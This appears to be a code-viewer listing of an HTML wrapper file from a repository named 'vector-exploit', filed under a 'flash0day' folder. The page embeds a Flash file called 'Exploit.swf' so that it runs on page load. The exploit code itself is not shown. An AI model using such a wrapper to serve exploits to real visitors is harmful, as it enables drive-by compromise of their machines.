hackedteam/vector-exploit

View on GitHub
src/flash0day/FlashDevelop-Project/bin/viewerWrapper.html~

Summary

Maintainability
Test Coverage
<html lang="en">
<!-- 
/****************************************************************************
 * ADOBE SYSTEMS INCORPORATED
 * Copyright 2012 Adobe Systems Incorporated and it’s licensors
 * All Rights Reserved.
 *  
 * NOTICE: Adobe permits you to use, modify, and distribute this file
 * in accordance with the terms of the license agreement accompanying it.
 * ****************************************************************************/
  -->

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Viewer Wrapper</title>
<style>
body { margin: 0px; overflow:hidden }
</style>
</head>
<body scroll="no">

<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="320" HEIGHT="240" id="uncompressed" ALIGN="">
<PARAM NAME=movie VALUE="Exploit.swf"> <PARAM NAME=quality VALUE=high> <PARAM NAME=bgcolor VALUE=#333399> <EMBED src="Exploit.swf" quality=high bgcolor=#333399 WIDTH="320" HEIGHT="240" NAME="uncompressed" ALIGN="" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED> </OBJECT>



</script>
</body>
</html>